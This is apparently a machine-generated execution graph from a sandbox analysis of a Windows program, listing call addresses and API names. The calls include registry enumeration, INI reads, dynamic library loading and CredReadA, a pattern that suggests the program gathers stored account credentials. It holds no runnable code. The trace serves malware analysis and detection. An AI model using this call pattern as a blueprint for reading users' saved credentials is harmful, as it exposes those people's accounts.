                                                      execution_graph 34102 40fc40 70 API calls 34275 403640 21 API calls 34103 427fa4 42 API calls 34276 412e43 _endthreadex 34277 425115 76 API calls __fprintf_l 34278 43fe40 133 API calls 34106 425115 83 API calls __fprintf_l 34107 401445 memcpy memcpy DialogBoxParamA 34108 440c40 34 API calls 34110 411853 RtlInitializeCriticalSection memset 34111 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34284 40a256 13 API calls 34286 432e5b 17 API calls 34288 43fa5a 20 API calls 34113 401060 41 API calls 34291 427260 CloseHandle memset memset 33167 410c68 FindResourceA 33168 410c81 SizeofResource 33167->33168 33171 410cae 33167->33171 33169 410c92 LoadResource 33168->33169 33168->33171 33170 410ca0 LockResource 33169->33170 33169->33171 33170->33171 34293 405e69 14 API calls 34118 433068 15 API calls __fprintf_l 34295 414a6d 18 API calls 34296 43fe6f 134 API calls 34120 424c6d 15 API calls __fprintf_l 34297 426741 19 API calls 34122 440c70 17 API calls 34123 443c71 44 API calls 34126 427c79 24 API calls 34300 416e7e memset __fprintf_l 34130 42800b 47 API calls 34131 425115 85 API calls __fprintf_l 34303 41960c 61 API calls 34132 43f40c 122 API calls __fprintf_l 34135 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34136 43f81a 20 API calls 34138 414c20 memset memset 34139 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34307 414625 18 API calls 34308 404225 modf 34309 403a26 strlen WriteFile 34311 40422a 12 API calls 34315 427632 memset memset memcpy 34316 40ca30 59 API calls 34317 404235 26 API calls 34140 42ec34 61 API calls __fprintf_l 34141 425115 76 API calls __fprintf_l 34318 425115 77 API calls __fprintf_l 34320 44223a 38 API calls 34147 43183c 112 API calls 34321 44b2c5 _onexit __dllonexit 34326 42a6d2 memcpy __allrem 34149 405cda 65 API calls 34334 43fedc 138 API calls 34335 4116e1 16 API calls __fprintf_l 34152 4244e6 19 API calls 34154 42e8e8 127 API calls __fprintf_l 34155 4118ee RtlLeaveCriticalSection 34340 43f6ec 22 API calls 34157 425115 119 API calls __fprintf_l 33157 410cf3 EnumResourceNamesA 34343 4492f0 memcpy memcpy 34345 43fafa 18 API calls 34347 4342f9 15 API calls __fprintf_l 34158 4144fd 19 API calls 34349 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34350 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34353 443a84 _mbscpy 34355 43f681 17 API calls 34161 404487 22 API calls 34357 415e8c 16 API calls __fprintf_l 34165 411893 RtlDeleteCriticalSection __fprintf_l 34166 41a492 42 API calls 34361 403e96 34 API calls 34362 410e98 memset SHGetPathFromIDList SendMessageA 34168 426741 109 API calls __fprintf_l 34169 4344a2 18 API calls 34170 4094a2 10 API calls 34365 4116a6 15 API calls __fprintf_l 34366 43f6a4 17 API calls 34367 440aa3 20 API calls 34369 427430 45 API calls 34173 4090b0 7 API calls 34174 4148b0 15 API calls 34176 4118b4 RtlEnterCriticalSection 34177 4014b7 CreateWindowExA 34178 40c8b8 19 API calls 34180 4118bf RtlTryEnterCriticalSection 34374 42434a 18 API calls __fprintf_l 34376 405f53 12 API calls 34188 43f956 59 API calls 34190 40955a 17 API calls 34191 428561 36 API calls 34192 409164 7 API calls 34380 404366 19 API calls 34384 40176c ExitProcess 34387 410777 42 API calls 34197 40dd7b 51 API calls 34198 425d7c 16 API calls __fprintf_l 34389 43f6f0 25 API calls 34390 42db01 22 API calls 34199 412905 15 API calls __fprintf_l 34391 403b04 54 API calls 34392 405f04 SetDlgItemTextA GetDlgItemTextA 34393 44b301 ??3@YAXPAX 34396 4120ea 14 API calls 3 library calls 34397 40bb0a 8 API calls 34399 413f11 strcmp 34203 434110 17 API calls __fprintf_l 34206 425115 108 API calls __fprintf_l 34400 444b11 _onexit 34208 425115 76 API calls __fprintf_l 34211 429d19 10 API calls 34403 444b1f __dllonexit 34404 409f20 _strcmpi 34213 42b927 31 API calls 34407 433f26 19 API calls __fprintf_l 34408 44b323 FreeLibrary 34409 427f25 46 API calls 34410 43ff2b 17 API calls 34411 43fb30 19 API calls 34220 414d36 16 API calls 34222 40ad38 7 API calls 34413 433b38 16 API calls __fprintf_l 34093 44b33b 34094 44b344 ??3@YAXPAX 34093->34094 34095 44b34b 34093->34095 34094->34095 34096 44b354 ??3@YAXPAX 34095->34096 34097 44b35b 34095->34097 34096->34097 34098 44b364 ??3@YAXPAX 34097->34098 34099 44b36b 34097->34099 34098->34099 34100 44b374 ??3@YAXPAX 34099->34100 34101 44b37b 34099->34101 34100->34101 34226 426741 21 API calls 34227 40c5c3 125 API calls 34229 43fdc5 17 API calls 34414 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34232 4161cb memcpy memcpy memcpy memcpy 33172 44b3cf 33173 44b3e6 33172->33173 33178 44b454 33172->33178 33173->33178 33185 44b40e GetModuleHandleA 33173->33185 33175 44b45d GetModuleHandleA 33179 44b467 33175->33179 33176 44b49a 33198 44b49f 33176->33198 33178->33175 33178->33176 33178->33179 33179->33178 33180 44b487 GetProcAddress 33179->33180 33180->33178 33181 44b405 33181->33178 33181->33179 33182 44b428 GetProcAddress 33181->33182 33182->33178 33183 44b435 VirtualProtect 33182->33183 33183->33178 33184 44b444 VirtualProtect 33183->33184 33184->33178 33186 44b417 33185->33186 33188 44b454 33185->33188 33217 44b42b GetProcAddress 33186->33217 33190 44b45d GetModuleHandleA 33188->33190 33191 44b49a 33188->33191 33197 44b467 33188->33197 33189 44b41c 33189->33188 33193 44b428 GetProcAddress 33189->33193 33190->33197 33192 44b49f 776 API calls 33191->33192 33192->33191 33193->33188 33194 44b435 VirtualProtect 33193->33194 33194->33188 33195 44b444 VirtualProtect 33194->33195 33195->33188 33196 44b487 GetProcAddress 33196->33188 33197->33188 33197->33196 33199 444c4a 33198->33199 33200 444c56 GetModuleHandleA 33199->33200 33201 444c68 __set_app_type __p__fmode __p__commode 33200->33201 33203 444cfa 33201->33203 33204 444d02 __setusermatherr 33203->33204 33205 444d0e 33203->33205 33204->33205 33226 444e22 _controlfp 33205->33226 33207 444d13 _initterm __getmainargs _initterm 33208 444d6a GetStartupInfoA 33207->33208 33210 444d9e GetModuleHandleA 33208->33210 33227 40cf44 33210->33227 33214 444dcf _cexit 33216 444e04 33214->33216 33215 444dc8 exit 33215->33214 33216->33176 33218 44b454 33217->33218 33219 44b435 VirtualProtect 33217->33219 33221 44b45d GetModuleHandleA 33218->33221 33222 44b49a 33218->33222 33219->33218 33220 44b444 VirtualProtect 33219->33220 33220->33218 33225 44b467 33221->33225 33223 44b49f 776 API calls 33222->33223 33223->33222 33224 44b487 GetProcAddress 33224->33225 33225->33218 33225->33224 33226->33207 33278 404a99 LoadLibraryA 33227->33278 33229 40cf60 33266 40cf64 33229->33266 33286 410d0e 33229->33286 33231 40cf6f 33290 40ccd7 ??2@YAPAXI 33231->33290 33233 40cf9b 33304 407cbc 33233->33304 33238 40cfc4 33322 409825 memset 33238->33322 33239 40cfd8 33327 4096f4 memset 33239->33327 33244 40d181 ??3@YAXPAX 33246 40d1b3 33244->33246 33247 40d19f DeleteObject 33244->33247 33245 407e30 _strcmpi 33248 40cfee 33245->33248 33351 407948 free free 33246->33351 33247->33246 33250 40cff2 RegDeleteKeyA 33248->33250 33251 40d007 EnumResourceTypesA 33248->33251 33250->33244 33253 40d047 33251->33253 33254 40d02f MessageBoxA 33251->33254 33252 40d1c4 33352 4080d4 free 33252->33352 33256 40d0a0 CoInitialize 33253->33256 33332 40ce70 33253->33332 33254->33244 33349 40cc26 strncat memset RegisterClassA CreateWindowExA 33256->33349 33259 40d1cd 33353 407948 free free 33259->33353 33261 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33350 40c256 PostMessageA 33261->33350 33263 40d061 ??3@YAXPAX 33263->33246 33267 40d084 DeleteObject 33263->33267 33264 40d09e 33264->33256 33266->33214 33266->33215 33267->33246 33270 40d0f9 GetMessageA 33271 40d17b CoUninitialize 33270->33271 33272 40d10d 33270->33272 33271->33244 33273 40d113 TranslateAccelerator 33272->33273 33275 40d145 IsDialogMessage 33272->33275 33276 40d139 IsDialogMessage 33272->33276 33273->33272 33274 40d16d GetMessageA 33273->33274 33274->33271 33274->33273 33275->33274 33277 40d157 TranslateMessage DispatchMessageA 33275->33277 33276->33274 33276->33275 33277->33274 33279 404ac4 GetProcAddress 33278->33279 33280 404aec 33278->33280 33281 404ad4 33279->33281 33282 404add FreeLibrary 33279->33282 33284 404b13 33280->33284 33285 404afc MessageBoxA 33280->33285 33281->33282 33282->33280 33283 404ae8 33282->33283 33283->33280 33284->33229 33285->33229 33287 410d17 LoadLibraryA 33286->33287 33288 410d3c 33286->33288 33287->33288 33289 410d2b GetProcAddress 33287->33289 33288->33231 33289->33288 33291 40cd08 ??2@YAPAXI 33290->33291 33293 40cd26 33291->33293 33294 40cd2d 33291->33294 33361 404025 6 API calls 33293->33361 33296 40cd66 33294->33296 33297 40cd59 DeleteObject 33294->33297 33354 407088 33296->33354 33297->33296 33299 40cd6b 33357 4019b5 33299->33357 33302 4019b5 strncat 33303 40cdbf _mbscpy 33302->33303 33303->33233 33363 407948 free free 33304->33363 33308 407a1f malloc memcpy free free 33311 407cf7 33308->33311 33309 407ddc 33317 407e04 33309->33317 33376 407a1f 33309->33376 33311->33308 33311->33309 33312 407d7a free 33311->33312 33311->33317 33367 40796e 7 API calls 33311->33367 33368 406f30 33311->33368 33312->33311 33364 407a55 33317->33364 33318 407e30 33319 407e57 33318->33319 33320 407e38 33318->33320 33319->33238 33319->33239 33320->33319 33321 407e41 _strcmpi 33320->33321 33321->33319 33321->33320 33382 4097ff 33322->33382 33324 409854 33387 409731 33324->33387 33328 4097ff 3 API calls 33327->33328 33329 409723 33328->33329 33407 40966c 33329->33407 33421 4023b2 33332->33421 33337 40ced3 33510 40cdda 7 API calls 33337->33510 33338 40cece 33342 40cf3f 33338->33342 33462 40c3d0 memset GetModuleFileNameA strrchr 33338->33462 33342->33263 33342->33264 33345 40ceed 33489 40affa 33345->33489 33349->33261 33350->33270 33351->33252 33352->33259 33353->33266 33362 406fc7 memset _mbscpy 33354->33362 33356 40709f CreateFontIndirectA 33356->33299 33358 4019e1 33357->33358 33359 4019c2 strncat 33358->33359 33360 4019e5 memset LoadIconA 33358->33360 33359->33358 33360->33302 33361->33294 33362->33356 33363->33311 33365 407a65 33364->33365 33366 407a5b free 33364->33366 33365->33318 33366->33365 33367->33311 33369 406f37 malloc 33368->33369 33370 406f7d 33368->33370 33372 406f73 33369->33372 33373 406f58 33369->33373 33370->33311 33372->33311 33374 406f6c free 33373->33374 33375 406f5c memcpy 33373->33375 33374->33372 33375->33374 33377 407a38 33376->33377 33378 407a2d free 33376->33378 33379 406f30 3 API calls 33377->33379 33380 407a43 33378->33380 33379->33380 33381 40796e 7 API calls 33380->33381 33381->33317 33398 406f96 GetModuleFileNameA 33382->33398 33384 409805 strrchr 33385 409814 33384->33385 33386 409817 _mbscat 33384->33386 33385->33386 33386->33324 33399 44b090 33387->33399 33392 40930c 3 API calls 33393 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33392->33393 33394 4097c5 LoadStringA 33393->33394 33395 4097db 33394->33395 33395->33394 33397 4097f3 33395->33397 33406 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33395->33406 33397->33244 33398->33384 33400 40973e _mbscpy _mbscpy 33399->33400 33401 40930c 33400->33401 33402 44b090 33401->33402 33403 409319 memset GetPrivateProfileStringA 33402->33403 33404 409374 33403->33404 33405 409364 WritePrivateProfileStringA 33403->33405 33404->33392 33405->33404 33406->33395 33417 406f81 GetFileAttributesA 33407->33417 33409 409675 33410 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33409->33410 33416 4096ee 33409->33416 33418 409278 GetPrivateProfileStringA 33410->33418 33412 4096c9 33419 409278 GetPrivateProfileStringA 33412->33419 33414 4096da 33420 409278 GetPrivateProfileStringA 33414->33420 33416->33245 33417->33409 33418->33412 33419->33414 33420->33416 33512 409c1c 33421->33512 33424 401e69 memset 33551 410dbb 33424->33551 33427 401ec2 33581 4070e3 strlen _mbscat _mbscpy _mbscat 33427->33581 33428 401ed4 33566 406f81 GetFileAttributesA 33428->33566 33431 401ee6 strlen strlen 33433 401f15 33431->33433 33434 401f28 33431->33434 33582 4070e3 strlen _mbscat _mbscpy _mbscat 33433->33582 33567 406f81 GetFileAttributesA 33434->33567 33437 401f35 33568 401c31 33437->33568 33440 401f75 33580 410a9c RegOpenKeyExA 33440->33580 33441 401c31 7 API calls 33441->33440 33443 401f91 33444 402187 33443->33444 33445 401f9c memset 33443->33445 33447 402195 ExpandEnvironmentStringsA 33444->33447 33448 4021a8 _strcmpi 33444->33448 33583 410b62 RegEnumKeyExA 33445->33583 33592 406f81 GetFileAttributesA 33447->33592 33448->33337 33448->33338 33450 40217e RegCloseKey 33450->33444 33451 401fd9 atoi 33452 401fef memset memset sprintf 33451->33452 33460 401fc9 33451->33460 33584 410b1e 33452->33584 33455 402165 33455->33450 33456 402076 memset memset strlen strlen 33456->33460 33457 4070e3 strlen _mbscat _mbscpy _mbscat 33457->33460 33458 4020dd strlen strlen 33458->33460 33459 406f81 GetFileAttributesA 33459->33460 33460->33450 33460->33451 33460->33455 33460->33456 33460->33457 33460->33458 33460->33459 33461 402167 _mbscpy 33460->33461 33591 410b62 RegEnumKeyExA 33460->33591 33461->33450 33463 40c422 33462->33463 33464 40c425 _mbscat _mbscpy _mbscpy 33462->33464 33463->33464 33465 40c49d 33464->33465 33466 40c512 33465->33466 33467 40c502 GetWindowPlacement 33465->33467 33468 40c538 33466->33468 33613 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33466->33613 33467->33466 33606 409b31 33468->33606 33472 40ba28 33473 40ba87 33472->33473 33479 40ba3c 33472->33479 33616 406c62 LoadCursorA SetCursor 33473->33616 33475 40ba8c 33617 410a9c RegOpenKeyExA 33475->33617 33618 404785 33475->33618 33621 403c16 33475->33621 33697 4107f1 33475->33697 33700 404734 33475->33700 33476 40ba43 _mbsicmp 33476->33479 33477 40baa0 33478 407e30 _strcmpi 33477->33478 33482 40bab0 33478->33482 33479->33473 33479->33476 33708 40b5e5 10 API calls 33479->33708 33480 40bafa SetCursor 33480->33345 33482->33480 33483 40baf1 qsort 33482->33483 33483->33480 34068 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33489->34068 33491 40b00e 33492 40b016 33491->33492 33493 40b01f GetStdHandle 33491->33493 34069 406d1a CreateFileA 33492->34069 33495 40b01c 33493->33495 33496 40b035 33495->33496 33497 40b12d 33495->33497 34070 406c62 LoadCursorA SetCursor 33496->34070 34074 406d77 9 API calls 33497->34074 33500 40b136 33511 40c580 28 API calls 33500->33511 33501 40b087 33508 40b0a1 33501->33508 34072 40a699 12 API calls 33501->34072 33502 40b042 33502->33501 33502->33508 34071 40a57c strlen WriteFile 33502->34071 33505 40b0d6 33506 40b116 CloseHandle 33505->33506 33507 40b11f SetCursor 33505->33507 33506->33507 33507->33500 33508->33505 34073 406d77 9 API calls 33508->34073 33510->33338 33511->33342 33524 409a32 33512->33524 33515 409c80 memcpy memcpy 33516 409cda 33515->33516 33516->33515 33517 409d18 ??2@YAPAXI ??2@YAPAXI 33516->33517 33518 408db6 12 API calls 33516->33518 33520 409d54 ??2@YAPAXI 33517->33520 33521 409d8b 33517->33521 33518->33516 33520->33521 33534 409b9c 33521->33534 33523 4023c1 33523->33424 33525 409a44 33524->33525 33526 409a3d ??3@YAXPAX 33524->33526 33527 409a52 33525->33527 33528 409a4b ??3@YAXPAX 33525->33528 33526->33525 33529 409a63 33527->33529 33530 409a5c ??3@YAXPAX 33527->33530 33528->33527 33531 409a83 ??2@YAPAXI ??2@YAPAXI 33529->33531 33532 409a73 ??3@YAXPAX 33529->33532 33533 409a7c ??3@YAXPAX 33529->33533 33530->33529 33531->33515 33532->33533 33533->33531 33535 407a55 free 33534->33535 33536 409ba5 33535->33536 33537 407a55 free 33536->33537 33538 409bad 33537->33538 33539 407a55 free 33538->33539 33540 409bb5 33539->33540 33541 407a55 free 33540->33541 33542 409bbd 33541->33542 33543 407a1f 4 API calls 33542->33543 33544 409bd0 33543->33544 33545 407a1f 4 API calls 33544->33545 33546 409bda 33545->33546 33547 407a1f 4 API calls 33546->33547 33548 409be4 33547->33548 33549 407a1f 4 API calls 33548->33549 33550 409bee 33549->33550 33550->33523 33552 410d0e 2 API calls 33551->33552 33553 410dca 33552->33553 33554 410dfd memset 33553->33554 33593 4070ae 33553->33593 33556 410e1d 33554->33556 33596 410a9c RegOpenKeyExA 33556->33596 33558 401e9e strlen strlen 33558->33427 33558->33428 33560 410e4a 33561 410e7f _mbscpy 33560->33561 33597 410d3d _mbscpy 33560->33597 33561->33558 33563 410e5b 33598 410add RegQueryValueExA 33563->33598 33565 410e73 RegCloseKey 33565->33561 33566->33431 33567->33437 33599 410a9c RegOpenKeyExA 33568->33599 33570 401c4c 33571 401cad 33570->33571 33600 410add RegQueryValueExA 33570->33600 33571->33440 33571->33441 33573 401c6a 33574 401c71 strchr 33573->33574 33575 401ca4 RegCloseKey 33573->33575 33574->33575 33576 401c85 strchr 33574->33576 33575->33571 33576->33575 33577 401c94 33576->33577 33601 406f06 strlen 33577->33601 33579 401ca1 33579->33575 33580->33443 33581->33428 33582->33434 33583->33460 33604 410a9c RegOpenKeyExA 33584->33604 33586 410b34 33587 410b5d 33586->33587 33605 410add RegQueryValueExA 33586->33605 33587->33460 33589 410b4c RegCloseKey 33589->33587 33591->33460 33592->33448 33594 4070bd GetVersionExA 33593->33594 33595 4070ce 33593->33595 33594->33595 33595->33554 33595->33558 33596->33560 33597->33563 33598->33565 33599->33570 33600->33573 33602 406f17 33601->33602 33603 406f1a memcpy 33601->33603 33602->33603 33603->33579 33604->33586 33605->33589 33607 409b40 33606->33607 33608 409b4e 33606->33608 33614 409901 memset SendMessageA 33607->33614 33610 409b99 33608->33610 33611 409b8b 33608->33611 33610->33472 33615 409868 SendMessageA 33611->33615 33613->33468 33614->33608 33615->33610 33616->33475 33617->33477 33619 4047a3 33618->33619 33620 404799 FreeLibrary 33618->33620 33619->33477 33620->33619 33622 4107f1 FreeLibrary 33621->33622 33623 403c30 LoadLibraryA 33622->33623 33624 403c74 33623->33624 33625 403c44 GetProcAddress 33623->33625 33627 4107f1 FreeLibrary 33624->33627 33625->33624 33626 403c5e 33625->33626 33626->33624 33630 403c6b 33626->33630 33628 403c7b 33627->33628 33629 404734 3 API calls 33628->33629 33631 403c86 33629->33631 33630->33628 33709 4036e5 33631->33709 33634 4036e5 27 API calls 33635 403c9a 33634->33635 33636 4036e5 27 API calls 33635->33636 33637 403ca4 33636->33637 33638 4036e5 27 API calls 33637->33638 33639 403cae 33638->33639 33721 4085d2 33639->33721 33647 403ce5 33648 403cf7 33647->33648 33902 402bd1 40 API calls 33647->33902 33767 410a9c RegOpenKeyExA 33648->33767 33651 403d0a 33652 403d1c 33651->33652 33903 402bd1 40 API calls 33651->33903 33768 402c5d 33652->33768 33656 4070ae GetVersionExA 33657 403d31 33656->33657 33786 410a9c RegOpenKeyExA 33657->33786 33659 403d51 33660 403d61 33659->33660 33904 402b22 47 API calls 33659->33904 33787 410a9c RegOpenKeyExA 33660->33787 33663 403d87 33664 403d97 33663->33664 33905 402b22 47 API calls 33663->33905 33788 410a9c RegOpenKeyExA 33664->33788 33667 403dbd 33668 403dcd 33667->33668 33906 402b22 47 API calls 33667->33906 33789 410808 33668->33789 33672 404785 FreeLibrary 33673 403de8 33672->33673 33793 402fdb 33673->33793 33676 402fdb 34 API calls 33677 403e00 33676->33677 33809 4032b7 33677->33809 33686 403e3b 33687 403e73 33686->33687 33688 403e46 _mbscpy 33686->33688 33856 40fb00 33687->33856 33908 40f334 334 API calls 33688->33908 33698 410807 33697->33698 33699 4107fc FreeLibrary 33697->33699 33698->33477 33699->33698 33701 404785 FreeLibrary 33700->33701 33702 40473b LoadLibraryA 33701->33702 33703 40474c GetProcAddress 33702->33703 33704 40476e 33702->33704 33703->33704 33705 404764 33703->33705 33706 404781 33704->33706 33707 404785 FreeLibrary 33704->33707 33705->33704 33706->33477 33707->33706 33708->33479 33710 4036fb 33709->33710 33713 4037c5 33709->33713 33909 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33710->33909 33712 40370e 33712->33713 33714 403716 strchr 33712->33714 33713->33634 33714->33713 33715 403730 33714->33715 33910 4021b6 memset 33715->33910 33717 40373f _mbscpy _mbscpy strlen 33718 4037a4 _mbscpy 33717->33718 33719 403789 sprintf 33717->33719 33911 4023e5 16 API calls 33718->33911 33719->33718 33722 4085e2 33721->33722 33912 4082cd 11 API calls 33722->33912 33726 408600 33727 403cba 33726->33727 33728 40860b memset 33726->33728 33739 40821d 33727->33739 33915 410b62 RegEnumKeyExA 33728->33915 33730 408637 33731 4086d2 RegCloseKey 33730->33731 33733 40865c memset 33730->33733 33916 410a9c RegOpenKeyExA 33730->33916 33919 410b62 RegEnumKeyExA 33730->33919 33731->33727 33917 410add RegQueryValueExA 33733->33917 33736 408694 33918 40848b 10 API calls 33736->33918 33738 4086ab RegCloseKey 33738->33730 33920 410a9c RegOpenKeyExA 33739->33920 33741 40823f 33742 403cc6 33741->33742 33743 408246 memset 33741->33743 33751 4086e0 33742->33751 33921 410b62 RegEnumKeyExA 33743->33921 33745 4082bf RegCloseKey 33745->33742 33747 40826f 33747->33745 33922 410a9c RegOpenKeyExA 33747->33922 33923 4080ed 11 API calls 33747->33923 33924 410b62 RegEnumKeyExA 33747->33924 33750 4082a2 RegCloseKey 33750->33747 33925 4045db 33751->33925 33756 408737 wcslen 33757 4088ef 33756->33757 33763 40876a 33756->33763 33933 404656 33757->33933 33758 40877a wcsncmp 33758->33763 33760 404734 3 API calls 33760->33763 33761 404785 FreeLibrary 33761->33763 33762 408812 memset 33762->33763 33764 40883c memcpy wcschr 33762->33764 33763->33757 33763->33758 33763->33760 33763->33761 33763->33762 33763->33764 33765 4088c3 LocalFree 33763->33765 33936 40466b _mbscpy 33763->33936 33764->33763 33765->33763 33766 410a9c RegOpenKeyExA 33766->33647 33767->33651 33937 410a9c RegOpenKeyExA 33768->33937 33770 402c7a 33771 402da5 33770->33771 33772 402c87 memset 33770->33772 33771->33656 33938 410b62 RegEnumKeyExA 33772->33938 33774 402d9c RegCloseKey 33774->33771 33775 410b1e 3 API calls 33776 402ce4 memset sprintf 33775->33776 33939 410a9c RegOpenKeyExA 33776->33939 33778 402d28 33779 402d3a sprintf 33778->33779 33940 402bd1 40 API calls 33778->33940 33941 410a9c RegOpenKeyExA 33779->33941 33782 402cb2 33782->33774 33782->33775 33785 402d9a 33782->33785 33942 402bd1 40 API calls 33782->33942 33943 410b62 RegEnumKeyExA 33782->33943 33785->33774 33786->33659 33787->33663 33788->33667 33790 410816 33789->33790 33791 4107f1 FreeLibrary 33790->33791 33792 403ddd 33791->33792 33792->33672 33944 410a9c RegOpenKeyExA 33793->33944 33795 402ff9 33796 403006 memset 33795->33796 33797 40312c 33795->33797 33945 410b62 RegEnumKeyExA 33796->33945 33797->33676 33799 403122 RegCloseKey 33799->33797 33800 410b1e 3 API calls 33801 403058 memset sprintf 33800->33801 33946 410a9c RegOpenKeyExA 33801->33946 33803 403033 33803->33799 33803->33800 33804 4030a2 memset 33803->33804 33805 410b62 RegEnumKeyExA 33803->33805 33807 4030f9 RegCloseKey 33803->33807 33948 402db3 26 API calls 33803->33948 33947 410b62 RegEnumKeyExA 33804->33947 33805->33803 33807->33803 33810 4032d5 33809->33810 33811 4033a9 33809->33811 33949 4021b6 memset 33810->33949 33824 4034e4 memset memset 33811->33824 33813 4032e1 33950 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33813->33950 33815 4032ea 33816 4032f8 memset GetPrivateProfileSectionA 33815->33816 33951 4023e5 16 API calls 33815->33951 33816->33811 33821 40332f 33816->33821 33818 40339b strlen 33818->33811 33818->33821 33820 403350 strchr 33820->33821 33821->33811 33821->33818 33952 4021b6 memset 33821->33952 33953 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33821->33953 33954 4023e5 16 API calls 33821->33954 33825 410b1e 3 API calls 33824->33825 33826 40353f 33825->33826 33827 40357f 33826->33827 33828 403546 _mbscpy 33826->33828 33832 403985 33827->33832 33955 406d55 strlen _mbscat 33828->33955 33830 403565 _mbscat 33956 4033f0 19 API calls 33830->33956 33957 40466b _mbscpy 33832->33957 33836 4039aa 33838 4039ff 33836->33838 33958 40f460 memset memset 33836->33958 33979 40f6e2 33836->33979 33997 4038e8 21 API calls 33836->33997 33839 404785 FreeLibrary 33838->33839 33840 403a0b 33839->33840 33841 4037ca memset memset 33840->33841 34005 444551 memset 33841->34005 33844 4038e2 33844->33686 33907 40f334 334 API calls 33844->33907 33846 40382e 33847 406f06 2 API calls 33846->33847 33848 403843 33847->33848 33849 406f06 2 API calls 33848->33849 33850 403855 strchr 33849->33850 33851 403884 _mbscpy 33850->33851 33852 403897 strlen 33850->33852 33854 4038bf _mbscpy 33851->33854 33853 4038a4 sprintf 33852->33853 33852->33854 33853->33854 34017 4023e5 16 API calls 33854->34017 33857 44b090 33856->33857 33858 40fb10 RegOpenKeyExA 33857->33858 33859 403e7f 33858->33859 33860 40fb3b RegOpenKeyExA 33858->33860 33870 40f96c 33859->33870 33861 40fb55 RegQueryValueExA 33860->33861 33862 40fc2d RegCloseKey 33860->33862 33863 40fc23 RegCloseKey 33861->33863 33864 40fb84 33861->33864 33862->33859 33863->33862 33865 404734 3 API calls 33864->33865 33866 40fb91 33865->33866 33866->33863 33867 40fc19 LocalFree 33866->33867 33868 40fbdd memcpy memcpy 33866->33868 33867->33863 34022 40f802 11 API calls 33868->34022 33871 4070ae GetVersionExA 33870->33871 33872 40f98d 33871->33872 33873 4045db 7 API calls 33872->33873 33877 40f9a9 33873->33877 33874 40fae6 33875 404656 FreeLibrary 33874->33875 33876 403e85 33875->33876 33882 4442ea memset 33876->33882 33877->33874 33878 40fa13 memset WideCharToMultiByte 33877->33878 33878->33877 33879 40fa43 _strnicmp 33878->33879 33879->33877 33880 40fa5b WideCharToMultiByte 33879->33880 33880->33877 33881 40fa88 WideCharToMultiByte 33880->33881 33881->33877 33883 410dbb 9 API calls 33882->33883 33884 444329 33883->33884 34023 40759e strlen strlen 33884->34023 33889 410dbb 9 API calls 33890 444350 33889->33890 33891 40759e 3 API calls 33890->33891 33892 44435a 33891->33892 33893 444212 65 API calls 33892->33893 33894 444366 memset memset 33893->33894 33895 410b1e 3 API calls 33894->33895 33896 4443b9 ExpandEnvironmentStringsA strlen 33895->33896 33897 4443f4 _strcmpi 33896->33897 33898 4443e5 33896->33898 33899 403e91 33897->33899 33900 44440c 33897->33900 33898->33897 33899->33477 33901 444212 65 API calls 33900->33901 33901->33899 33902->33648 33903->33652 33904->33660 33905->33664 33906->33668 33907->33686 33908->33687 33909->33712 33910->33717 33911->33713 33913 40841c 33912->33913 33914 410a9c RegOpenKeyExA 33913->33914 33914->33726 33915->33730 33916->33730 33917->33736 33918->33738 33919->33730 33920->33741 33921->33747 33922->33747 33923->33750 33924->33747 33926 404656 FreeLibrary 33925->33926 33927 4045e3 LoadLibraryA 33926->33927 33928 404651 33927->33928 33929 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33927->33929 33928->33756 33928->33757 33930 40463d 33929->33930 33931 404643 33930->33931 33932 404656 FreeLibrary 33930->33932 33931->33928 33932->33928 33934 403cd2 33933->33934 33935 40465c FreeLibrary 33933->33935 33934->33766 33935->33934 33936->33763 33937->33770 33938->33782 33939->33778 33940->33779 33941->33782 33942->33782 33943->33782 33944->33795 33945->33803 33946->33803 33947->33803 33948->33803 33949->33813 33950->33815 33951->33816 33952->33820 33953->33821 33954->33821 33955->33830 33956->33827 33957->33836 33998 4078ba 33958->33998 33961 4078ba _mbsnbcat 33962 40f5a3 RegOpenKeyExA 33961->33962 33963 40f5c3 RegQueryValueExA 33962->33963 33964 40f6d9 33962->33964 33965 40f6d0 RegCloseKey 33963->33965 33966 40f5f0 33963->33966 33964->33836 33965->33964 33966->33965 33967 40f675 33966->33967 34002 40466b _mbscpy 33966->34002 33967->33965 34003 4012ee strlen 33967->34003 33969 40f611 33971 404734 3 API calls 33969->33971 33976 40f616 33971->33976 33972 40f69e RegQueryValueExA 33972->33965 33973 40f6c1 33972->33973 33973->33965 33974 40f66a 33975 404785 FreeLibrary 33974->33975 33975->33967 33976->33974 33977 40f661 LocalFree 33976->33977 33978 40f645 memcpy 33976->33978 33977->33974 33978->33977 34004 40466b _mbscpy 33979->34004 33981 40f6fa 33982 4045db 7 API calls 33981->33982 33983 40f708 33982->33983 33984 40f7e2 33983->33984 33985 404734 3 API calls 33983->33985 33986 404656 FreeLibrary 33984->33986 33987 40f715 33985->33987 33988 40f7f1 33986->33988 33987->33984 33989 40f71d CredReadA 33987->33989 33990 404785 FreeLibrary 33988->33990 33989->33984 33992 40f734 33989->33992 33991 40f7fc 33990->33991 33991->33836 33992->33984 33992->33992 33993 40f797 WideCharToMultiByte 33992->33993 33994 40f7b8 strlen 33993->33994 33995 40f7d9 LocalFree 33993->33995 33994->33995 33996 40f7c8 _mbscpy 33994->33996 33995->33984 33996->33995 33997->33836 33999 4078e6 33998->33999 34000 4078c7 _mbsnbcat 33999->34000 34001 4078ea 33999->34001 34000->33999 34001->33961 34002->33969 34003->33972 34004->33981 34018 410a9c RegOpenKeyExA 34005->34018 34007 44458b 34008 40381a 34007->34008 34019 410add RegQueryValueExA 34007->34019 34008->33844 34016 4021b6 memset 34008->34016 34010 4445dc RegCloseKey 34010->34008 34011 4445a4 